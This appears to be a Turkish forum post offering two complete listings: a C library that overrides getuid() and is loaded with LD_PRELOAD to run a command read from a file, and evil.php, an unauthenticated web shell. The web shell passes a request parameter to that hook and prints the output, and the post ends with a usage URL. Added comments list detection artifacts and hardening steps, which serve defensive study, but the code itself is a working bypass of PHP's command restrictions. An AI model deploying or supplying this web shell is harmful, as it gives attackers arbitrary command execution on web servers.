a.c kodu:
Code:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * Replacement for libc's getuid(), intended to be compiled into a.so and
 * injected with LD_PRELOAD (the PHP listing on this page sets
 * LD_PRELOAD to <path>/a.so for the process it spawns). Any dynamically
 * linked program started with that environment runs this body the first
 * time it calls getuid(), instead of the real function.
 *
 * What it does: reads one line from the file ".comm" in the current
 * directory and hands it to system(), i.e. it turns a getuid() call into
 * execution of a command line taken from a file.
 *
 * Reviewer notes (defensive):
 *  - Artifacts to look for on a host: .comm, .comm1, output.txt and a.so /
 *    b.so appearing in a web-writable directory, and web-server child
 *    processes whose environment contains LD_PRELOAD.
 *  - The hook only works if the web user can write a shared object
 *    somewhere the loader will map it. A read-only document root, noexec on
 *    writable mounts, and a MAC policy (SELinux/AppArmor) on the web server
 *    remove that precondition.
 *
 * Returns 0 always, so the hooked caller sees 0 instead of its real uid.
 */
int getuid()
{
    char *en;                        /* declared but never used */
    char *buf=malloc(300);           /* result is not checked */
    FILE *a;

    /* Drop LD_PRELOAD from this process's environment; presumably so the
     * shell started by system() below does not load the hook again. */
    unsetenv("LD_PRELOAD");

    /* ".comm" is resolved against the process's working directory. On this
     * page it is written by the PHP listing from the request's "c"
     * parameter. No return value is checked: if the file is missing, the
     * fgets() call on a NULL stream is undefined behaviour (typically a
     * crash of the hooked process). */
    a=fopen(".comm","r");
    buf=fgets(buf,100,a);            /* at most 99 bytes of the first line; buf becomes NULL on EOF/error */

    /* Echo the command to fd 2. In the PHP listing fd 2 is opened on
     * errors.txt in append mode, so that file would accumulate every
     * command that was run; useful evidence during incident response. */
    write(2,buf,strlen(buf));
    fclose(a);

    /* The library is renamed for the duration of the command and renamed
     * back afterwards; presumably a second guard against the child
     * processes loading it. The page does not explain this step. */
    rename("a.so","b.so");
    system(buf);                     /* the file's contents are run by the shell, unvalidated */
    system("mv output.txt .comm1");  /* moves the captured stdout to the file the PHP listing reads back */
    rename("b.so","a.so");

    free(buf);
    return 0;
}
evil.php kodu:
Code:
<?php
// Companion script to the getuid() hook shown in the a.c listing on this page.
// It stores the request's "c" parameter in a file, starts a process with
// LD_PRELOAD pointing at a.so, and prints back whatever the hook left in
// .comm1. In effect it is an unauthenticated web shell: anyone who can
// reach the script chooses the command line that the preloaded library
// passes to system().
//
// Reviewer notes (defensive):
//  - Preconditions: proc_open() must be callable with a caller-supplied
//    environment, and the PHP user must be able to write into $path.
//    Listing proc_open (and the other process-spawning functions) in
//    disable_functions, keeping the document root read-only for the PHP
//    user, and mounting writable directories noexec each break the chain.
//    PHP-level restrictions are hardening, not a sandbox; pair them with
//    OS-level confinement (SELinux/AppArmor, a dedicated low-privilege user).
//  - Detection: requests carrying a "c" query parameter to an unexpected
//    script; .comm, .comm1, output.txt, errors.txt or *.so files created
//    under the web root; PHP workers spawning children with LD_PRELOAD set.

$path="/var/www"; // directory the script writes to; must be writable by the PHP user

// The query parameter is written to .comm exactly as received: no
// authentication, validation or length limit.
$a=fopen($path."/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);

// stdin is a pipe, stdout is captured to output.txt (truncated on each
// request), stderr is appended to errors.txt.
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("file", $path."/output.txt","w"),
    2 => array("file", $path."/errors.txt", "a" )
);
$cwd = '.';

// The child's environment contains only LD_PRELOAD, so the dynamic loader
// maps a.so into whatever proc_open() starts.
$env = array('LD_PRELOAD' => $path."/a.so");

// Author's note: the literal command here is only an example and "should
// not succeed". The command that actually matters is the one the hook reads
// from .comm. NOTE(review): presumably this targets a PHP restriction on
// which commands may run; the page does not say which one.
$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env);

sleep(1); // fixed one-second wait before reading the result file

// .comm1 is echoed into the page without HTML escaping, so command output
// is rendered as markup by the browser. The opening <b> is never closed.
$a=fopen($path."/.comm1","r");
echo "<pre><b>";
while (!feof($a)) {$b=fgets($a);echo $b;}
fclose($a);
echo "</pre>";
?>
bypass.www.site.com/evil.php?c=komut